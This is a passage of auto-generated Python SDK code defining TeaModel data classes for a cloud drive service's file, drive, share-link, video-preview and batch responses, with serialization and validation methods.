if self.col is not None:
result['col'] = self.col
if self.count is not None:
result['count'] = self.count
if self.frame_count is not None:
result['frame_count'] = self.frame_count
if self.frame_height is not None:
result['frame_height'] = self.frame_height
if self.frame_width is not None:
result['frame_width'] = self.frame_width
if self.row is not None:
result['row'] = self.row
if self.status is not None:
result['status'] = self.status
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('col') is not None:
self.col = m.get('col')
if m.get('count') is not None:
self.count = m.get('count')
if m.get('frame_count') is not None:
self.frame_count = m.get('frame_count')
if m.get('frame_height') is not None:
self.frame_height = m.get('frame_height')
if m.get('frame_width') is not None:
self.frame_width = m.get('frame_width')
if m.get('row') is not None:
self.row = m.get('row')
if m.get('status') is not None:
self.status = m.get('status')
return self
class VideoPreviewResponse(TeaModel):
"""
*\
"""
def __init__(
self,
audio_channels: int = None,
audio_format: str = None,
audio_meta: VideoPreviewAudioMeta = None,
audio_music_meta: VideoPreviewAudioMusicMeta = None,
audio_sample_rate: str = None,
audio_template_list: List[VideoPreviewTranscode] = None,
bitrate: str = None,
duration: str = None,
frame_rate: str = None,
height: int = None,
sprite_info: VideoPreviewSprite = None,
template_list: List[VideoPreviewTranscode] = None,
thumbnail: str = None,
video_format: str = None,
width: int = None,
):
# audio_channels
self.audio_channels = audio_channels
# audio_format
self.audio_format = audio_format
self.audio_meta = audio_meta
self.audio_music_meta = audio_music_meta
# audio_sample_rate
self.audio_sample_rate = audio_sample_rate
# audio_template_list
self.audio_template_list = audio_template_list
# bitrate
self.bitrate = bitrate
# duration
self.duration = duration
# frame_rate
self.frame_rate = frame_rate
# height
self.height = height
self.sprite_info = sprite_info
# template_list
self.template_list = template_list
# thumbnail
self.thumbnail = thumbnail
# video_format
self.video_format = video_format
# width
self.width = width
def validate(self):
if self.audio_meta:
self.audio_meta.validate()
if self.audio_music_meta:
self.audio_music_meta.validate()
if self.audio_template_list:
for k in self.audio_template_list:
if k:
k.validate()
if self.sprite_info:
self.sprite_info.validate()
if self.template_list:
for k in self.template_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.audio_channels is not None:
result['audio_channels'] = self.audio_channels
if self.audio_format is not None:
result['audio_format'] = self.audio_format
if self.audio_meta is not None:
result['audio_meta'] = self.audio_meta.to_map()
if self.audio_music_meta is not None:
result['audio_music_meta'] = self.audio_music_meta.to_map()
if self.audio_sample_rate is not None:
result['audio_sample_rate'] = self.audio_sample_rate
result['audio_template_list'] = []
if self.audio_template_list is not None:
for k in self.audio_template_list:
result['audio_template_list'].append(k.to_map() if k else None)
if self.bitrate is not None:
result['bitrate'] = self.bitrate
if self.duration is not None:
result['duration'] = self.duration
if self.frame_rate is not None:
result['frame_rate'] = self.frame_rate
if self.height is not None:
result['height'] = self.height
if self.sprite_info is not None:
result['sprite_info'] = self.sprite_info.to_map()
result['template_list'] = []
if self.template_list is not None:
for k in self.template_list:
result['template_list'].append(k.to_map() if k else None)
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.video_format is not None:
result['video_format'] = self.video_format
if self.width is not None:
result['width'] = self.width
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('audio_channels') is not None:
self.audio_channels = m.get('audio_channels')
if m.get('audio_format') is not None:
self.audio_format = m.get('audio_format')
if m.get('audio_meta') is not None:
temp_model = VideoPreviewAudioMeta()
self.audio_meta = temp_model.from_map(m['audio_meta'])
if m.get('audio_music_meta') is not None:
temp_model = VideoPreviewAudioMusicMeta()
self.audio_music_meta = temp_model.from_map(m['audio_music_meta'])
if m.get('audio_sample_rate') is not None:
self.audio_sample_rate = m.get('audio_sample_rate')
self.audio_template_list = []
if m.get('audio_template_list') is not None:
for k in m.get('audio_template_list'):
temp_model = VideoPreviewTranscode()
self.audio_template_list.append(temp_model.from_map(k))
if m.get('bitrate') is not None:
self.bitrate = m.get('bitrate')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('frame_rate') is not None:
self.frame_rate = m.get('frame_rate')
if m.get('height') is not None:
self.height = m.get('height')
if m.get('sprite_info') is not None:
temp_model = VideoPreviewSprite()
self.sprite_info = temp_model.from_map(m['sprite_info'])
self.template_list = []
if m.get('template_list') is not None:
for k in m.get('template_list'):
temp_model = VideoPreviewTranscode()
self.template_list.append(temp_model.from_map(k))
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('video_format') is not None:
self.video_format = m.get('video_format')
if m.get('width') is not None:
self.width = m.get('width')
return self
class BaseCCPFileResponse(TeaModel):
"""
Base file response
"""
def __init__(
self,
category: str = None,
characteristic_hash: str = None,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
encrypt_mode: str = None,
file_extension: str = None,
file_id: str = None,
hidden: bool = None,
image_media_metadata: ImageMediaResponse = None,
labels: List[str] = None,
meta: str = None,
name: str = None,
parent_file_id: str = None,
punish_flag: int = None,
share_id: str = None,
size: int = None,
starred: bool = None,
status: str = None,
streams_info: dict = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
user_meta: str = None,
video_media_metadata: VideoMediaResponse = None,
video_preview_metadata: VideoPreviewResponse = None,
):
# category
self.category = category
# CharacteristicHash
self.characteristic_hash = characteristic_hash
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# DomainID
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# encrypt_mode
self.encrypt_mode = encrypt_mode
# file_extension
self.file_extension = file_extension
# file_id
self.file_id = file_id
# Hidden
type: boolean
self.hidden = hidden
self.image_media_metadata = image_media_metadata
# labels
self.labels = labels
self.meta = meta
# name
self.name = name
# parent_file_id
self.parent_file_id = parent_file_id
self.punish_flag = punish_flag
self.share_id = share_id
# Size
self.size = size
# starred
type: boolean
self.starred = starred
# status
self.status = status
# @Deprecated streams url info
self.streams_info = streams_info
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
# user_meta
self.user_meta = user_meta
self.video_media_metadata = video_media_metadata
self.video_preview_metadata = video_preview_metadata
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.image_media_metadata:
self.image_media_metadata.validate()
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
if self.video_media_metadata:
self.video_media_metadata.validate()
if self.video_preview_metadata:
self.video_preview_metadata.validate()
def to_map(self):
result = dict()
if self.category is not None:
result['category'] = self.category
if self.characteristic_hash is not None:
result['characteristic_hash'] = self.characteristic_hash
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_id is not None:
result['file_id'] = self.file_id
if self.hidden is not None:
result['hidden'] = self.hidden
if self.image_media_metadata is not None:
result['image_media_metadata'] = self.image_media_metadata.to_map()
if self.labels is not None:
result['labels'] = self.labels
if self.meta is not None:
result['meta'] = self.meta
if self.name is not None:
result['name'] = self.name
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.punish_flag is not None:
result['punish_flag'] = self.punish_flag
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.starred is not None:
result['starred'] = self.starred
if self.status is not None:
result['status'] = self.status
if self.streams_info is not None:
result['streams_info'] = self.streams_info
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
if self.user_meta is not None:
result['user_meta'] = self.user_meta
if self.video_media_metadata is not None:
result['video_media_metadata'] = self.video_media_metadata.to_map()
if self.video_preview_metadata is not None:
result['video_preview_metadata'] = self.video_preview_metadata.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('category') is not None:
self.category = m.get('category')
if m.get('characteristic_hash') is not None:
self.characteristic_hash = m.get('characteristic_hash')
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('hidden') is not None:
self.hidden = m.get('hidden')
if m.get('image_media_metadata') is not None:
temp_model = ImageMediaResponse()
self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
if m.get('labels') is not None:
self.labels = m.get('labels')
if m.get('meta') is not None:
self.meta = m.get('meta')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('punish_flag') is not None:
self.punish_flag = m.get('punish_flag')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('starred') is not None:
self.starred = m.get('starred')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('streams_info') is not None:
self.streams_info = m.get('streams_info')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
if m.get('user_meta') is not None:
self.user_meta = m.get('user_meta')
if m.get('video_media_metadata') is not None:
temp_model = VideoMediaResponse()
self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
if m.get('video_preview_metadata') is not None:
temp_model = VideoPreviewResponse()
self.video_preview_metadata = temp_model.from_map(m['video_preview_metadata'])
return self
class BaseDriveResponse(TeaModel):
"""
Base drive response
"""
def __init__(
self,
creator: str = None,
description: str = None,
domain_id: str = None,
drive_id: str = None,
drive_name: str = None,
drive_type: str = None,
encrypt_data_access: bool = None,
encrypt_mode: str = None,
owner: str = None,
relative_path: str = None,
status: str = None,
store_id: str = None,
total_size: int = None,
used_size: int = None,
):
# Drive 创建者
self.creator = creator
# Drive 备注信息
self.description = description
# Domain ID
self.domain_id = domain_id
# Drive ID
self.drive_id = drive_id
# Drive 名称
self.drive_name = drive_name
# Drive 类型
self.drive_type = drive_type
self.encrypt_data_access = encrypt_data_access
self.encrypt_mode = encrypt_mode
# Drive 所有者
self.owner = owner
# Drive存储基于store的相对路径,domain的PathType为OSSPath时返回
self.relative_path = relative_path
# Drive 状态
self.status = status
# 存储 ID, domain的PathType为OSSPath时返回
self.store_id = store_id
# Drive 空间总量
self.total_size = total_size
# Drive 空间已使用量
self.used_size = used_size
def validate(self):
pass
def to_map(self):
result = dict()
if self.creator is not None:
result['creator'] = self.creator
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.drive_name is not None:
result['drive_name'] = self.drive_name
if self.drive_type is not None:
result['drive_type'] = self.drive_type
if self.encrypt_data_access is not None:
result['encrypt_data_access'] = self.encrypt_data_access
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.owner is not None:
result['owner'] = self.owner
if self.relative_path is not None:
result['relative_path'] = self.relative_path
if self.status is not None:
result['status'] = self.status
if self.store_id is not None:
result['store_id'] = self.store_id
if self.total_size is not None:
result['total_size'] = self.total_size
if self.used_size is not None:
result['used_size'] = self.used_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('drive_name') is not None:
self.drive_name = m.get('drive_name')
if m.get('drive_type') is not None:
self.drive_type = m.get('drive_type')
if m.get('encrypt_data_access') is not None:
self.encrypt_data_access = m.get('encrypt_data_access')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('relative_path') is not None:
self.relative_path = m.get('relative_path')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('total_size') is not None:
self.total_size = m.get('total_size')
if m.get('used_size') is not None:
self.used_size = m.get('used_size')
return self
class BaseFileAnonymousResponse(TeaModel):
"""
list_file_by_anonymous base response
"""
def __init__(
self,
file_id: str = None,
name: str = None,
size: int = None,
thumbnail: str = None,
type: str = None,
updated_at: str = None,
):
# file_id
self.file_id = file_id
# name
self.name = name
# size, type=file时才有效
self.size = size
# thumbnail
self.thumbnail = thumbnail
# type
self.type = type
# updated_at
self.updated_at = updated_at
def validate(self):
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
def to_map(self):
result = dict()
if self.file_id is not None:
result['file_id'] = self.file_id
if self.name is not None:
result['name'] = self.name
if self.size is not None:
result['size'] = self.size
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class BaseHostingFileResponse(TeaModel):
"""
Base file response
"""
def __init__(
self,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
file_extension: str = None,
file_path: str = None,
name: str = None,
parent_file_path: str = None,
share_id: str = None,
size: int = None,
status: str = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
):
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# domain_id
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# file_extension
self.file_extension = file_extension
# file_path
self.file_path = file_path
# name
self.name = name
# parent_file_id
self.parent_file_path = parent_file_path
# share_id
self.share_id = share_id
# Size
self.size = size
# status
self.status = status
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_path is not None:
self.validate_max_length(self.parent_file_path, 'parent_file_path', 50)
self.validate_pattern(self.parent_file_path, 'parent_file_path', '[a-z0-9]{1,50}')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
def to_map(self):
result = dict()
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_path is not None:
result['file_path'] = self.file_path
if self.name is not None:
result['name'] = self.name
if self.parent_file_path is not None:
result['parent_file_path'] = self.parent_file_path
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.status is not None:
result['status'] = self.status
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_path') is not None:
self.parent_file_path = m.get('parent_file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
return self
class BaseShareLinkResponse(TeaModel):
"""
list_share_link response
"""
def __init__(
self,
created_at: str = None,
creator: str = None,
description: str = None,
download_count: int = None,
drive_id: str = None,
expiration: str = None,
expired: bool = None,
file_id: str = None,
file_id_list: List[str] = None,
file_path_list: List[str] = None,
preview_count: int = None,
save_count: int = None,
share_id: str = None,
share_msg: str = None,
share_name: str = None,
share_policy: str = None,
share_pwd: str = None,
share_url: str = None,
updated_at: str = None,
):
# created_at
self.created_at = created_at
# creator
self.creator = creator
# description
self.description = description
# 下载次数
self.download_count = download_count
# drive_id
self.drive_id = drive_id
# expiration
self.expiration = expiration
# expired
self.expired = expired
# file_id
self.file_id = file_id
# file_id_list
self.file_id_list = file_id_list
# file_id_list
self.file_path_list = file_path_list
# preview_count
self.preview_count = preview_count
# 转存次数
self.save_count = save_count
# share_id
self.share_id = share_id
# share_msg
self.share_msg = share_msg
# share_name
self.share_name = share_name
# share_policy
self.share_policy = share_policy
# share_pwd
self.share_pwd = share_pwd
# share_url
self.share_url = share_url
# updated_at
self.updated_at = updated_at
def validate(self):
pass
def to_map(self):
result = dict()
if self.created_at is not None:
result['created_at'] = self.created_at
if self.creator is not None:
result['creator'] = self.creator
if self.description is not None:
result['description'] = self.description
if self.download_count is not None:
result['download_count'] = self.download_count
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expiration is not None:
result['expiration'] = self.expiration
if self.expired is not None:
result['expired'] = self.expired
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_list is not None:
result['file_id_list'] = self.file_id_list
if self.file_path_list is not None:
result['file_path_list'] = self.file_path_list
if self.preview_count is not None:
result['preview_count'] = self.preview_count
if self.save_count is not None:
result['save_count'] = self.save_count
if self.share_id is not None:
result['share_id'] = self.share_id
if self.share_msg is not None:
result['share_msg'] = self.share_msg
if self.share_name is not None:
result['share_name'] = self.share_name
if self.share_policy is not None:
result['share_policy'] = self.share_policy
if self.share_pwd is not None:
result['share_pwd'] = self.share_pwd
if self.share_url is not None:
result['share_url'] = self.share_url
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('download_count') is not None:
self.download_count = m.get('download_count')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('expired') is not None:
self.expired = m.get('expired')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_list') is not None:
self.file_id_list = m.get('file_id_list')
if m.get('file_path_list') is not None:
self.file_path_list = m.get('file_path_list')
if m.get('preview_count') is not None:
self.preview_count = m.get('preview_count')
if m.get('save_count') is not None:
self.save_count = m.get('save_count')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('share_msg') is not None:
self.share_msg = m.get('share_msg')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
if m.get('share_policy') is not None:
self.share_policy = m.get('share_policy')
if m.get('share_pwd') is not None:
self.share_pwd = m.get('share_pwd')
if m.get('share_url') is not None:
self.share_url = m.get('share_url')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class SharePermissionPolicy(TeaModel):
"""
*\
"""
def __init__(
self,
file_id: str = None,
file_path: str = None,
permission_inheritable: bool = None,
permission_list: List[str] = None,
permission_type: str = None,
):
self.file_id = file_id
self.file_path = file_path
self.permission_inheritable = permission_inheritable
self.permission_list = permission_list
self.permission_type = permission_type
def validate(self):
pass
def to_map(self):
result = dict()
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.permission_inheritable is not None:
result['permission_inheritable'] = self.permission_inheritable
if self.permission_list is not None:
result['permission_list'] = self.permission_list
if self.permission_type is not None:
result['permission_type'] = self.permission_type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('permission_inheritable') is not None:
self.permission_inheritable = m.get('permission_inheritable')
if m.get('permission_list') is not None:
self.permission_list = m.get('permission_list')
if m.get('permission_type') is not None:
self.permission_type = m.get('permission_type')
return self
class BaseShareResponse(TeaModel):
"""
List share response
"""
def __init__(
self,
created_at: str = None,
creator: str = None,
description: str = None,
domain_id: str = None,
drive_id: str = None,
expiration: str = None,
expired: bool = None,
owner: str = None,
permissions: List[str] = None,
share_file_id: str = None,
share_file_path: str = None,
share_id: str = None,
share_name: str = None,
share_policy: List[SharePermissionPolicy] = None,
status: str = None,
updated_at: str = None,
):
# created_at
self.created_at = created_at
# creator
self.creator = creator
# description
self.description = description
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# expiration
self.expiration = expiration
# expired
self.expired = expired
# owner
self.owner = owner
# permissions
self.permissions = permissions
# share_file_id
self.share_file_id = share_file_id
# share_path
self.share_file_path = share_file_path
# share_id
self.share_id = share_id
# share_name
self.share_name = share_name
self.share_policy = share_policy
# status
self.status = status
# updated_at
self.updated_at = updated_at
def validate(self):
if self.share_policy:
for k in self.share_policy:
if k:
k.validate()
def to_map(self):
result = dict()
if self.created_at is not None:
result['created_at'] = self.created_at
if self.creator is not None:
result['creator'] = self.creator
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expiration is not None:
result['expiration'] = self.expiration
if self.expired is not None:
result['expired'] = self.expired
if self.owner is not None:
result['owner'] = self.owner
if self.permissions is not None:
result['permissions'] = self.permissions
if self.share_file_id is not None:
result['share_file_id'] = self.share_file_id
if self.share_file_path is not None:
result['share_file_path'] = self.share_file_path
if self.share_id is not None:
result['share_id'] = self.share_id
if self.share_name is not None:
result['share_name'] = self.share_name
result['share_policy'] = []
if self.share_policy is not None:
for k in self.share_policy:
result['share_policy'].append(k.to_map() if k else None)
if self.status is not None:
result['status'] = self.status
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('expired') is not None:
self.expired = m.get('expired')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('permissions') is not None:
self.permissions = m.get('permissions')
if m.get('share_file_id') is not None:
self.share_file_id = m.get('share_file_id')
if m.get('share_file_path') is not None:
self.share_file_path = m.get('share_file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
self.share_policy = []
if m.get('share_policy') is not None:
for k in m.get('share_policy'):
temp_model = SharePermissionPolicy()
self.share_policy.append(temp_model.from_map(k))
if m.get('status') is not None:
self.status = m.get('status')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class BatchSubResponse(TeaModel):
"""
*\
"""
def __init__(
self,
body: dict = None,
id: str = None,
status: int = None,
):
# body 子请求的返回结果,可参考对于子请求文档 json 字符串
self.body = body
# id 请求带过来的id, 可以跟 request 进行关联
self.id = id
# status 子请求的返回状态码,可参考对于子请求文档
self.status = status
def validate(self):
pass
def to_map(self):
result = dict()
if self.body is not None:
result['body'] = self.body
if self.id is not None:
result['id'] = self.id
if self.status is not None:
result['status'] = self.status
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('body') is not None:
self.body = m.get('body')
if m.get('id') is not None:
self.id = m.get('id')
if m.get('status') is not None:
self.status = m.get('status')
return self
class BatchResponse(TeaModel):
"""
batch operation response
"""
def __init__(
self,
responses: List[BatchSubResponse] = None,
):
# responses 返回结果合集
self.responses = responses
def validate(self):
if self.responses:
for k in self.responses:
if k:
k.validate()
def to_map(self):
result = dict()
result['responses'] = []
if self.responses is not None:
for k in self.responses:
result['responses'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.responses = []
if m.get('responses') is not None:
for k in m.get('responses'):
temp_model = BatchSubResponse()
self.responses.append(temp_model.from_map(k))
return self
class CancelLinkRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
temporary_token: str = None,
):
self.headers = headers
# 待绑定的临时token,此token只能访问绑定、取消绑定接口
self.temporary_token = temporary_token
def validate(self):
self.validate_required(self.temporary_token, 'temporary_token')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.temporary_token is not None:
result['temporary_token'] = self.temporary_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('temporary_token') is not None:
self.temporary_token = m.get('temporary_token')
return self
class CompleteFileResponse(TeaModel):
"""
complete file response
"""
def __init__(
self,
category: str = None,
characteristic_hash: str = None,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
encrypt_mode: str = None,
file_extension: str = None,
file_id: str = None,
hidden: bool = None,
image_media_metadata: ImageMediaResponse = None,
labels: List[str] = None,
location: str = None,
meta: str = None,
name: str = None,
parent_file_id: str = None,
punish_flag: int = None,
share_id: str = None,
size: int = None,
starred: bool = None,
status: str = None,
